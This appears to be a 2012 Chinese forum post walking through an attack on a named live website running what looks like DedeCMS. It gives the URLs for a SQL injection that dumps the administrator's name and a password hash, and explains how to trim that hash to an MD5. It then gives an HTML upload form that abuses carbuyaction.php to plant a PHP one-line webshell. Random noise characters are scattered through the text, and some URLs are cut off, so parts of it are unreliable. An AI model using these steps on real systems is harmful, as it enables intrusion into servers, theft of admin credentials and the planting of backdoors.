①注入漏洞。
. [: b2 b6 h1 {* p这站 http://www.political-security.com/
6 m3 Q U: O6 U6 J0 O首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,0 ]4 q5 @5 {/ T; Q6 t. P
www.political-security.com/data/mysql_error_trace.inc 爆后台
- A d$ \* t/ ^ V: Q然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。# y8 i7 _- m3 O) W
然后写上语句
$ J: u4 Y9 S. f* z% F& [' Y查看管理员帐号
. {% G, Z5 n+ a) ?http://www.political-security.co ... &membergroup=@`1 A, W$ h [4 F* K
9 u) e m# A! q
admin
$ T c# Z8 y5 y* e8 _- l$ ~0 G
~* x5 n; Y# ]: x查看管理员密码
, h+ \: `9 Q- g1 U( s- ]4 } http://www.political-security.co ... &membergroup=@`
: X; D2 G. E4 u) R( Q2 {
3 I) t5 A5 U! z8 C8d29b1ef9f8c5a5af4293 A0 u2 t5 [; B% c2 I" ~( Y1 P3 o) d
$ h/ i7 x# i5 N1 a Z
查看管理员密码
7 O4 S9 h3 L4 {- J8 ]0 Q1 H3 m5 v F7 v* H7 V4 I+ f( M
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
# I% |8 t' h/ f; ^
! r4 Q- i& U1 I2 y8d2
' A' t, V5 F% M- M- Q9b1ef9f8c5a5af42
- s2 g$ G9 _8 D7 h" h/ v0 S$ a9
9 S' f2 Q0 ~, w3 O# w. x/ l$ l+ m, p$ e; O6 Z
cmd5没解出来 只好测试第二个方法
# C3 A. q' X. x9 U8 H
, x5 M( n& S* J9 C+ a' m- I/ z2 c6 \9 G
②上传漏洞:
7 Z" ~+ u- a) [- l% L
# N9 c" ^3 e" s3 N `4 Q# f只要登陆会员中心,然后访问页面链接
+ E, L$ L g' S; [! ~8 X" G. U. \“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
. q2 a: v) q; |! x3 G0 X% x0 B N
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
2 T j8 |% ^( R7 {: q7 }1 L: h. r
3 P. |: J* V' C: j6 Q8 E于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
- V& ? Z2 g D$ F$ u, L! u1 \" D% \1 i& J
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>8 w) \$ r7 }" @
或者8 b, `- X( f) w# H: y: N. v3 e
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对